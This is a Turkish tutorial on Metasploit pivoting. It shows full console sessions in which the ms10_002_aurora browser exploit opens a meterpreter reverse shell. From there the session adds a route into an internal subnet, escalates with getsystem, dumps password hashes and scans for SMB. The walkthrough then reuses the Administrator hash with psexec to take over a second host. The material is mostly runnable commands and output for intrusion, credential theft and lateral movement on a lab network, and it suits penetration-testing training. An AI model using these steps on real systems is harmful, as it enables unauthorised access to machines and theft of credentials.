MSF Pivoting

Estimated read time 9 min read

Pivoting Nedir?

Bir sistemde meterpreter shell oturumu açtığınızı varsayalım. Oturum açtığınız sistem, ağda bulunan ancak tam yetkili bir bilgisayar olmayabilir. Bu ilk oturum açtığınız sistemi bir sıçrama tahtası olarak kullanıp aynı ağdaki diğer bilgisayarlara erişmeye pivoting adı verilmektedir. Başka bir terminolojide kıyı başı veya giriş noktası olarak isimlendirildiğine de rast gelebilirsiniz.

Normalde doğrudan erişimi bulunmayan sunucu veya ağ sistemlerine, pivoting kullanarak erişme şansınız bulunmaktadır. Aşağıda inceleyeceğimiz senaryoda, meterpreter shell açılan bir bilgisayarın ağ bağlantılarını kullanarak, başka bir bilgisayara ulaşmayı deneyeceğiz. Bunu yaparken, meterpreter’in sunduğu rotalama imkanından yararlanacağız.

1.Bilgisayara Shell Açalım

Burada kullanılan exploit/windows/browser/ms10_002_aurora modülü sayesinde, hazırlanan zararlı bir linke tıklayan şirket çalışanının bilgisayarında oturum açılmaktadır.

msf > use exploit/windows/browser/ms10_002_aurora 
msf exploit(ms10_002_aurora) > show options

Module options:

  Name    Current Setting Required Description
  ----    --------------- -------- -----------
  SRVHOST   0.0.0.0     yes    The local host to listen on.
  SRVPORT   8080       yes    The local port to listen on.
  SSL     false      no    Negotiate SSL for incoming connections
  SSLVersion SSL3       no    Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
  URIPATH           no    The URI to use for this exploit (default is random)


Exploit target:

  Id Name
  -- ----
  0  Automatic


msf exploit(ms10_002_aurora) > set URIPATH /
URIPATH => /
msf exploit(ms10_002_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora) > set LHOST 192.168.1.101
LHOST => 192.168.1.101
msf exploit(ms10_002_aurora) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.101:4444 
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.1.101:8080/
[*] Server started.
msf exploit(ms10_002_aurora) >

Açılan yeni oturumu sessions -l komutuyla görebilirsiniz. Aşağıdaki listede kendi IP adresimizden LHOST: 192.168.1.101 diğer hedef bilgisayara RHOST:192.168.1.201 bağlantı kurulduğu görülmektedir.

msf exploit(ms10_002_aurora) > 
[*] Sending Internet Explorer "Aurora" Memory Corruption to client 192.168.1.201
[*] Sending stage (749056 bytes) to 192.168.1.201
[*] Meterpreter session 1 opened (192.168.1.101:4444 -> 192.168.1.201:8777) at Mon Dec 06 08:22:29 -0700 2010

msf exploit(ms10_002_aurora) > sessions -l

Active sessions
===============

 Id Type          Information                   Connection
 -- ----          -----------                   ----------
 1  meterpreter x86/win32 XEN-XP-SP2-BARE\Administrator @ XEN-XP-SP2-BARE 192.168.1.101:4444 -> 192.168.1.201:8777

msf exploit(ms10_002_aurora) >

1.Bilgisayarın Ağ Kartları

Şimdi bu oturuma girelim ve ipconfig komutuyla hedef bilgisayarın ağ ayarlarına bakalım.

msf exploit(ms10_002_aurora) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ipconfig

Citrix XenServer PV Ethernet Adapter #2 - Packet Scheduler Miniport
Hardware MAC: d2:d6:70:fa:de:65
IP Address : 10.1.13.3
Netmask   : 255.255.255.0MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask   : 255.0.0.0Citrix XenServer PV Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: c6:ce:4e:d9:c9:6e
IP Address : 192.168.1.201
Netmask   : 255.255.255.0


meterpreter >

Bizim oturum açtığımız bilgisayarın IP adresinden anlıyoruz ki bağlandığımız ağ kartı Citrix XenServer PV Ethernet Adapter - Packet Scheduler Miniport isimli karttır.

Oysa sistemde

MS TCP Loopback interface ve

Citrix XenServer PV Ethernet Adapter #2 - Packet Scheduler Miniport

isimli 2 kart daha var. Bunlardan MS TCP Loopback interface isimli arayüz, zaten localhost olarak kullanılan iletişim aracıdır.

O zaman, Citrix XenServer PV Ethernet Adapter #2 - Packet Scheduler Miniport isimli diğer ağ yapılandırmasına odaklanalım.

Citrix XenServer PV Ethernet Adapter #2 - Packet Scheduler Miniport
Hardware MAC: d2:d6:70:fa:de:65
IP Address : 10.1.13.3
Netmask   : 255.255.255.0

Bu bilgilerden anladığımız kadarıyla Citrix XenServer PV Ethernet Adapter #2 - Packet Scheduler Miniport isimli kartın IP adresi 10.1.13.3. O zaman bu ağa bağlananlara 10.1.13.1-255 aralığında IP adresleri verildiğini anlıyoruz. CIDR formatında bu 10.1.13.0/24 olarak gösteriliyor.

Meterpreter’in sağladığı imkanlardan bir tanesi de autoroute script kodudur. autoroute hakkında yardımı görüntüleyelim.

meterpreter > run autoroute -h
[*] Usage:  run autoroute [-r] -s subnet -n netmask
[*] Examples:
[*]  run autoroute -s 10.1.1.0 -n 255.255.255.0 # Add a route to 10.10.10.1/255.255.255.0
[*]  run autoroute -s 10.10.10.1         # Netmask defaults to 255.255.255.0
[*]  run autoroute -s 10.10.10.1/24       # CIDR notation is also okay
[*]  run autoroute -p              # Print active routing table
[*]  run autoroute -d -s 10.10.10.1       # Deletes the 10.10.10.1/255.255.255.0 route
[*] Use the "route" and "ipconfig" Meterpreter commands to learn about available routes

Şimdi otomatik rotalama yapalım. Bunun için aşağıdaki komutu kullanıyoruz.

meterpreter > run autoroute -s 10.1.13.0/24
[*] Adding a route to 10.1.13.0/255.255.255.0...
[+] Added route to 10.1.13.0/255.255.255.0 via 192.168.1.201
[*] Use the -p option to list all active routes

Rotalama yapıldı. Kontrol edelim.

meterpreter > run autoroute -p

Active Routing Table
====================

  Subnet       Netmask      Gateway
  ------       -------      -------
  10.1.13.0     255.255.255.0   Session 1

meterpreter >

2.Bilgisayara Bağlantı

İlk bilgisayarda getsystem komutuyla hash bilgilerini elde edelim. Bu hash bilgilerini kullanarak 2. bilgisayara bağlanmaya çalışacağız. Ağdaki bilgisayarların, hash değerleriyle yetki kontrolü yaptığını hatırlayın. Bu teknikle ilgili Metasploit Framework Yetki Yükseltme yazısına bakabilirsiniz.

Aşağıdaki komutlarla, getsystem ile SYSTEM bilgilerini elde ediyoruz, hashdump ile hash bilgilerini alıyoruz ve CTRL+Z tuşları ile oturumu arka plana gönderiyoruz.

meterpreter > getsystem
...got system (via technique 1).

meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY c2ec80f879c1b5dc8d2b64f1e2c37a45...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...


Administrator:500:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:9a6ae26408b0629ddc621c90c897b42d:07a59dbe14e2ea9c4792e2f189e2de3a:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:ebf9fa44b3204029db5a8a77f5350160:::
victim:1004:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d:::


meterpreter > 
Background session 1? [y/N] 
msf exploit(ms10_002_aurora) >

2.Bilgisayar Ağını Tarama

Rotalama sayesinde artık 2. bilgisayar ağı ile haberleşebiliyoruz. O zaman bu ağı tarayalım ve 139 ile 445 numaralı portları açık olup olmadığına bakalım. İsterseniz tüm portları da tarayabilirsiniz. Biz sadece örnek vermek için bu iki portu tarayacağız. Bu tarama işlemi için auxiliary/scanner/portscan/tcp modülünü kullanacağız. Modülde RHOSTS değişkenini RHOSTS 10.1.13.0/24 olarak ayarladığımıza dikkat edin.

msf exploit(ms10_002_aurora) > use auxiliary/scanner/portscan/tcp 
msf auxiliary(tcp) > show options

Module options:

  Name     Current Setting Required Description
  ----     --------------- -------- -----------
  CONCURRENCY 10        yes    The number of concurrent ports to check per host
  FILTER            no    The filter string for capturing traffic
  INTERFACE           no    The name of the interface
  PCAPFILE           no    The name of the PCAP capture file to process
  PORTS    1-10000     yes    Ports to scan (e.g. 22-25,80,110-900)
  RHOSTS            yes    The target address range or CIDR identifier
  SNAPLEN   65535      yes    The number of bytes to capture
  THREADS   1        yes    The number of concurrent threads
  TIMEOUT   1000       yes    The socket connect timeout in milliseconds
  VERBOSE   false      no    Display verbose output

msf auxiliary(tcp) > set RHOSTS 10.1.13.0/24
RHOST => 10.1.13.0/24
msf auxiliary(tcp) > set PORTS 139,445
PORTS => 139,445
msf auxiliary(tcp) > set THREADS 50
THREADS => 50
msf auxiliary(tcp) > run

[*] 10.1.13.3:139 - TCP OPEN
[*] 10.1.13.3:445 - TCP OPEN
[*] 10.1.13.2:445 - TCP OPEN
[*] 10.1.13.2:139 - TCP OPEN
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tcp) >

Yapılan tarama sonucunda 10.1.13.2 ve 10.1.13.3 olarak 2 IP adresi bulduk. Bunlardan 10.1.13.3 IP adresi zaten bizim 1. bilgisayara ait olduğundan 10.1.13.2 IP adresine odaklanacağız.

Bağlantı Yapalım

445 numaralı portun samba ağ paylaşım işlemlerinden kullanıldığını biliyoruz. Öyleyse, exploit/windows/smb/psexec modülünü kullanabiliriz. Modül ayarlarını yaparken, ilk bilgisayardan elde ettiğimiz Administrator:500:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d hash değerlerini girdiğimize dikkat edin.

msf auxiliary(tcp) > use exploit/windows/smb/psexec 
msf exploit(psexec) > show options

Module options:

  Name    Current Setting Required Description
  ----    --------------- -------- -----------
  RHOST            yes    The target address
  RPORT   445       yes    Set the SMB service port
  SMBDomain WORKGROUP    no    The Windows domain to use for authentication
  SMBPass           no    The password for the specified username
  SMBUser           no    The username to authenticate as


Exploit target:

  Id Name
  -- ----
  0  Automatic


msf exploit(psexec) > set RHOST 10.1.13.2
RHOST => 10.1.13.2

msf exploit(psexec) > set SMBUser Administrator
SMBUser => Administrator

msf exploit(psexec) > set SMBPass 81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d
SMBPass => 81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d

msf exploit(psexec) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp

msf exploit(psexec) > exploit

[*] Connecting to the server...
[*] Started bind handler
[*] Authenticating to 10.1.13.2:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created \qNuIKByV.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.1.13.2[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.1.13.2[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (UOtrbJMd - "MNYR")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \qNuIKByV.exe...
[*] Sending stage (749056 bytes)
[*] Meterpreter session 2 opened (192.168.1.101-192.168.1.201:0 -> 10.1.13.2:4444) at Mon Dec 06 08:56:42 -0700 2010

meterpreter >

Gördüğünüz gibi 2. bilgisayara bağlantı sağladık. Bu bağlantıyı yukarıda [*] Meterpreter session 2 opened (192.168.1.101-192.168.1.201:0 -> 10.1.13.2:4444) satırından da görebileceğiniz gibi 192.168.1.101-192.168.1.201:0 -> 10.1.13.2:4444 rotasını takip ederek yaptık.

192.168.1.101: Kendi bilgisayarımız

192.168.1.201: Pivot olarak kullanılan bilgisayar

10.1.13.2: Erişim sağlanan 2. bilgisayar.

İkinci bilgisayarın ipconfig ayarlarına bakalım.

meterpreter > ipconfig

Citrix XenServer PV Ethernet Adapter
Hardware MAC: 22:73:ff:12:11:4b
IP Address : 10.1.13.2
Netmask   : 255.255.255.0MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask   : 255.0.0.0


meterpreter >

Görüldüğü gibi pivoting çok güçlü bir tekniktir. Bir ağda, herhangi bir bilgisayara erişim sağladıktan sonra, ağdaki diğer sistemlere ulaşmanızda size yardımcı olmaktadır.